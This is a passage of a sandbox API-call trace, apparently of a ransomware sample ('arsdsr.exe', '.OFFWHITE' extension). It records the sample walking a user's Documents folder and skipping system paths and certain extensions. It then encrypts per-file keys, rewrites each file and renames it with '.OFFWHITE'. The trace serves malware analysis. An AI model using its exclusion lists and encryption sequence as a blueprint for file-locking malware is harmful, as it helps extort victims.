HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.059] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.060] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\*.*" [0133.060] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc23eb230, ftCreationTime.dwHighDateTime=0x1d5dec5, ftLastAccessTime.dwLowDateTime=0x202d9920, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x202d9920, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName=".", cAlternateFileName="")) returned 0x544790 [0133.071] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0133.071] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc23eb230, ftCreationTime.dwHighDateTime=0x1d5dec5, ftLastAccessTime.dwLowDateTime=0x202d9920, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x202d9920, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="..", cAlternateFileName="")) returned 1 [0133.071] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0133.071] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0133.071] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1dcdd80, ftCreationTime.dwHighDateTime=0x1d5d873, ftLastAccessTime.dwLowDateTime=0x7c363a10, ftLastAccessTime.dwHighDateTime=0x1d5dca9, ftLastWriteTime.dwLowDateTime=0x7c363a10, ftLastWriteTime.dwHighDateTime=0x1d5dca9, nFileSizeHigh=0x0, nFileSizeLow=0x4e9b, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="57WDU8A6n.xls", cAlternateFileName="57WDU8~1.XLS")) returned 1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2=".") returned 1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="..") returned 1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="...") returned 1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="windows") returned -1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="$recycle.bin") returned 1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="rsa") returned -1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="ntuser.dat") returned -1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="programdata") returned -1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="appdata") returned -1 [0133.071] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="program files") returned -1 [0133.072] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="program files (x86)") returned -1 [0133.072] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.072] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\", lpString2="57WDU8A6n.xls" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls" [0133.072] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.072] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.072] PathFindExtensionW (pszPath="57WDU8A6n.xls") returned=".xls" [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".com") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".cpl") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".url") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".mp3") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".pif") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".mp4") returned 1 [0133.072] lstrcmpiW (lpString1=".xls", lpString2=".OFFWHITE") returned 1 [0133.073] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0133.073] lstrcmpiW (lpString1="57WDU8A6n.xls", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.073] GetProcessHeap () returned 0x500000 [0133.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f698 [0133.073] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\57wdu8a6n.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0133.075] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=20123) returned 1 [0133.075] GetProcessHeap () returned 0x500000 [0133.075] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.075] GetProcessHeap () returned 0x500000 [0133.075] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.075] GetProcessHeap () returned 0x500000 [0133.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.076] GetProcessHeap () returned 0x500000 [0133.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.076] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.077] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.077] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.077] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c910*=0x100) returned 1 [0133.078] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.078] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.078] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c90c*=0x100) returned 1 [0133.078] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x4e9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.078] SetLastError (dwErrCode=0x0) [0133.078] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.082] GetLastError () returned 0x0 [0133.082] GetLastError () returned 0x0 [0133.082] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x4f9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.082] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.082] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x509b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.082] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f698*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f698*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0133.082] GetProcessHeap () returned 0x500000 [0133.082] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4e9b) returned 0x55d7d0 [0133.082] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.082] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x4e9b, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x4e9b, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.084] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x4e9b, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x4e9b, lpOverlapped=0x0) returned 1 [0133.085] GetProcessHeap () returned 0x500000 [0133.085] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0133.085] CloseHandle (hObject=0x1e4) returned 1 [0133.086] GetProcessHeap () returned 0x500000 [0133.086] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.086] GetProcessHeap () returned 0x500000 [0133.086] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.086] GetProcessHeap () returned 0x500000 [0133.086] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.086] GetProcessHeap () returned 0x500000 [0133.086] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.086] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls" [0133.086] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls.OFFWHITE" [0133.086] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\57wdu8a6n.xls"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\57WDU8A6n.xls.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\57wdu8a6n.xls.offwhite")) returned 1 [0133.087] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59280e60, ftCreationTime.dwHighDateTime=0x1d5e51c, ftLastAccessTime.dwLowDateTime=0x7deca470, ftLastAccessTime.dwHighDateTime=0x1d5e5f0, ftLastWriteTime.dwLowDateTime=0x7deca470, ftLastWriteTime.dwHighDateTime=0x1d5e5f0, nFileSizeHigh=0x0, nFileSizeLow=0xc95d, dwReserved0=0x295cb3c, dwReserved1=0xc9372cc9, cFileName="eHZTkE.ods", cAlternateFileName="")) returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2=".") returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="..") returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="...") returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="windows") returned -1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="$recycle.bin") returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="rsa") returned -1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="ntuser.dat") returned -1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="programdata") returned -1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="appdata") returned 1 [0133.087] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="program files") returned -1 [0133.088] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="program files (x86)") returned -1 [0133.088] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\" [0133.088] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\", lpString2="eHZTkE.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods" [0133.088] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.088] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.088] PathFindExtensionW (pszPath="eHZTkE.ods") returned=".ods" [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".exe") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".log") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".cab") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".cmd") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".com") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".cpl") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".url") returned -1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".ttf") returned -1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".mp3") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".pif") returned -1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".mp4") returned 1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".OFFWHITE") returned -1 [0133.088] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0133.088] lstrcmpiW (lpString1="eHZTkE.ods", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.088] GetProcessHeap () returned 0x500000 [0133.088] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f6a8 [0133.088] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\ehztke.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0133.089] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=51549) returned 1 [0133.089] GetProcessHeap () returned 0x500000 [0133.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.089] GetProcessHeap () returned 0x500000 [0133.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.089] GetProcessHeap () returned 0x500000 [0133.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.089] GetProcessHeap () returned 0x500000 [0133.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.089] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.089] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.089] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295c910*=0x100) returned 1 [0133.089] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.089] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.090] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295c90c*=0x100) returned 1 [0133.090] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xc95d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.090] SetLastError (dwErrCode=0x0) [0133.090] WriteFile (in: hFile=0x1e4, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.091] GetLastError () returned 0x0 [0133.091] GetLastError () returned 0x0 [0133.092] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xca5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.092] WriteFile (in: hFile=0x1e4, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0133.092] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xcb5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.092] WriteFile (in: hFile=0x1e4, lpBuffer=0x53f6a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x53f6a8*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0133.092] GetProcessHeap () returned 0x500000 [0133.092] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc95d) returned 0x55d7d0 [0133.092] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.092] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0xc95d, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0xc95d, lpOverlapped=0x0) returned 1 [0133.095] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.095] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0xc95d, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0xc95d, lpOverlapped=0x0) returned 1 [0133.095] GetProcessHeap () returned 0x500000 [0133.095] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0133.095] CloseHandle (hObject=0x1e4) returned 1 [0133.097] GetProcessHeap () returned 0x500000 [0133.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.097] GetProcessHeap () returned 0x500000 [0133.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.097] GetProcessHeap () returned 0x500000 [0133.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.097] GetProcessHeap () returned 0x500000 [0133.097] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.097] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods" [0133.097] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods.OFFWHITE" [0133.097] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\ehztke.ods"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\aZ8e0Ld0z\\eHZTkE.ods.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\kb-m\\az8e0ld0z\\ehztke.ods.offwhite")) returned 1 [0133.098] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x187422b0, 